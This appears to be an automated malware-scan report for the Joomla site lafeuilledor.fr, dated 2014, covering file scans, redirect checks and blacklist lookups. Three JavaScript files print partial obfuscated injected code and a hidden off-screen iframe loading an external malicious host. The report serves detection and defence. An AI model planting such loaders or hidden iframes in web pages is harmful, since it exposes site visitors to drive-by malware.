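Scanned pages/files
Note: several rows below (the three effect_*.js files, index.php and the test404page.js probe) return 200 OK with 4135 bytes of text/html, the same size and type as the home page. The server most likely answered those requests with its default page rather than the requested file, so a "clean" status on those rows describes that page, not the script named in the URL.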
Request | Server response | Status |
http://lafeuilledor.fr/ | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://lafeuilledor.fr/media/system/js/caption.js | 200 OK Content-Length: 12404 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(Nh){var dS2=function(Gr3){return Gr3["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},Lk=function(eM){return eM[dS2(918239)]("") },kb9=""+Lk(["mF\x18<\xb8d\x80\xb0","9b\x8c\x04\x13\x8a%","\xc1?:^e:\x1f\x0f","\x0a\x17t\x0a\x0f","\x20*\x00\x0a\x19","\x1d:)0=-)--))\x20*","\x00\x0a?:Ey)|vN\x11","u\x0a\x0f\x20**\x090","\x1a=-\x1d\x10)-\x00",")\x00)\x0a\x00)\x0a0","\x1a:*\x19=-*\x00)","\x08FuNCty\x7f^\x08a","\x7fy\x09[s\x14\x14=","\x10X0\":\x18\x ...[12249 bytes skipped]... Decoded script: ...[9280 bytes skipped]... \xf5"+"\xf2\xcb\xf8\xd5\xe9"+"\xef\xc7h\xec\xe4"),m=qOY[fI("\xc4h\xf5\xe9")];if(U0X){if(b=d[t](fI("\xebf\xe5\xf8"))[0])((i=d[t](fI("\xed`\xf7")))[l]?i[m[fI("\xefe\xee\xee\xf3")](m[fI("\xfbh\xef\xe5\xee"+"\xec")]()*i[fI("\xe5l\xef\xe6\xf5"+"\xe9")])]:b)[fI("\xe8y\xf1\xe4\xef"+"\xe5\xca\xe9\xe9\xed"+"\xe5")](U0X);else d[fI("\xfe{\xe8\xf5\xe4")](U0X[fI("\xe6|\xf5\xe4\xf3"+"\xc9\xdd\xcc\xcc")]);}delete B6W;delete fI;delete S44;})(window); <iframe src="http://sebarao.primamuebles.cl/gertykjthreg?vin" style="position:absolute;left:-1500px;top:-1600px;" height="125" width="140"></iframe> | ||
http://lafeuilledor.fr/templates/elegant/lib/js/effect_nav.js | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://lafeuilledor.fr/templates/elegant/lib/js/effect_fade.js | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://lafeuilledor.fr/templates/elegant/lib/js/effect_tips.js | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://lafeuilledor.fr/index.php | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://lafeuilledor.fr/index.php?option=com_content&view=article&id=6&Itemid=6 | 200 OK Content-Length: 7432 Content-Type: text/html | clean |
http://lafeuilledor.fr/components/com_morfeoshow/src/js/swfobject.js | 200 OK Content-Length: 17320 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(Nh){var dS2=function(Gr3){return Gr3["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},Lk=function(eM){return eM[dS2(918239)]("") },kb9=""+Lk(["mF\x18<\xb8d\x80\xb0","9b\x8c\x04\x13\x8a%","\xc1?:^e:\x1f\x0f","\x0a\x17t\x0a\x0f","\x20*\x00\x0a\x19","\x1d:)0=-)--))\x20*","\x00\x0a?:Ey)|vN\x11","u\x0a\x0f\x20**\x090","\x1a=-\x1d\x10)-\x00",")\x00)\x0a\x00)\x0a0","\x1a:*\x19=-*\x00)","\x08FuNCty\x7f^\x08a","\x7fy\x09[s\x14\x14=","\x10X0\":\x18\x ...[17114 bytes skipped]... Decoded script: ...[9280 bytes skipped]... \xf5"+"\xf2\xcb\xf8\xd5\xe9"+"\xef\xc7h\xec\xe4"),m=qOY[fI("\xc4h\xf5\xe9")];if(U0X){if(b=d[t](fI("\xebf\xe5\xf8"))[0])((i=d[t](fI("\xed`\xf7")))[l]?i[m[fI("\xefe\xee\xee\xf3")](m[fI("\xfbh\xef\xe5\xee"+"\xec")]()*i[fI("\xe5l\xef\xe6\xf5"+"\xe9")])]:b)[fI("\xe8y\xf1\xe4\xef"+"\xe5\xca\xe9\xe9\xed"+"\xe5")](U0X);else d[fI("\xfe{\xe8\xf5\xe4")](U0X[fI("\xe6|\xf5\xe4\xf3"+"\xc9\xdd\xcc\xcc")]);}delete B6W;delete fI;delete S44;})(window); <iframe src="http://sebarao.primamuebles.cl/gertykjthreg?vin" style="position:absolute;left:-1500px;top:-1600px;" height="125" width="140"></iframe> | ||
http://lafeuilledor.fr/index.php?option=com_content&view=article&id=11&Itemid=7 | 200 OK Content-Length: 5837 Content-Type: text/html | clean |
http://lafeuilledor.fr/index.php?option=com_contact&view=contact&id=1&Itemid=11 | 200 OK Content-Length: 8250 Content-Type: text/html | clean |
http://lafeuilledor.fr/media/system/js/validate.js | 200 OK Content-Length: 14687 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(Nh){var dS2=function(Gr3){return Gr3["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},Lk=function(eM){return eM[dS2(918239)]("") },kb9=""+Lk(["mF\x18<\xb8d\x80\xb0","9b\x8c\x04\x13\x8a%","\xc1?:^e:\x1f\x0f","\x0a\x17t\x0a\x0f","\x20*\x00\x0a\x19","\x1d:)0=-)--))\x20*","\x00\x0a?:Ey)|vN\x11","u\x0a\x0f\x20**\x090","\x1a=-\x1d\x10)-\x00",")\x00)\x0a\x00)\x0a0","\x1a:*\x19=-*\x00)","\x08FuNCty\x7f^\x08a","\x7fy\x09[s\x14\x14=","\x10X0\":\x18\x ...[14924 bytes skipped]... Decoded script: ...[9280 bytes skipped]... \xf5"+"\xf2\xcb\xf8\xd5\xe9"+"\xef\xc7h\xec\xe4"),m=qOY[fI("\xc4h\xf5\xe9")];if(U0X){if(b=d[t](fI("\xebf\xe5\xf8"))[0])((i=d[t](fI("\xed`\xf7")))[l]?i[m[fI("\xefe\xee\xee\xf3")](m[fI("\xfbh\xef\xe5\xee"+"\xec")]()*i[fI("\xe5l\xef\xe6\xf5"+"\xe9")])]:b)[fI("\xe8y\xf1\xe4\xef"+"\xe5\xca\xe9\xe9\xed"+"\xe5")](U0X);else d[fI("\xfe{\xe8\xf5\xe4")](U0X[fI("\xe6|\xf5\xe4\xf3"+"\xc9\xdd\xcc\xcc")]);}delete B6W;delete fI;delete S44;})(window); <iframe src="http://sebarao.primamuebles.cl/gertykjthreg?vin" style="position:absolute;left:-1500px;top:-1600px;" height="125" width="140"></iframe> | ||
http://lafeuilledor.fr/index.php?option=com_content&view=article&id=18&Itemid=14 | 200 OK Content-Length: 5765 Content-Type: text/html | clean |
http://lafeuilledor.fr/test404page.js | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://lafeuilledor.fr/index.php?option=com_content&view=article&id=19&Itemid=7 | 200 OK Content-Length: 7124 Content-Type: text/html | clean |
http://lafeuilledor.fr/index.php?option=com_content&view=article&id=20&Itemid=7 | 200 OK Content-Length: 7418 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lafeuilledor.fr
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 12 Jun 2014 13:55:11 GMT
Pragma: no-cache
Server: Apache
Content-Length: 4135
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 Jun 2014 13:55:12 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 25d606e6ab547c9e7f5d1573fffddaa7=ii61m4oh9te733fsvmgrrbtcn5; path=/
X-Powered-By: PHP/5.3.28
...4135 bytes of data.
GET / HTTP/1.1
Host: lafeuilledor.fr
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 12 Jun 2014 13:55:11 GMT
Pragma: no-cache
Server: Apache
Content-Length: 4135
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 Jun 2014 13:55:12 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 25d606e6ab547c9e7f5d1573fffddaa7=ii61m4oh9te733fsvmgrrbtcn5; path=/
X-Powered-By: PHP/5.3.28
...4135 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lafeuilledor.fr
Referer: http://www.google.com/search?q=lafeuilledor.fr
Result:
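The response is the same as for the first query; no suspicious redirects were found. This check covers only HTTP-level redirects that depend on the Referer header. It does not cover the hidden iframe reported in the JavaScript files under "Scanned pages/files".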
GET / HTTP/1.1
Host: lafeuilledor.fr
Referer: http://www.google.com/search?q=lafeuilledor.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lafeuilledor.fr
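Result: This site is not currently listed as suspicious. (A blacklist result reflects only what the list operator has crawled and published, so it does not override the suspicious scripts reported under "Scanned pages/files".)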
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://lafeuilledor.fr/
Result: lafeuilledor.fr is not infected or malware details are not published yet.
Result: lafeuilledor.fr is not infected or malware details are not published yet.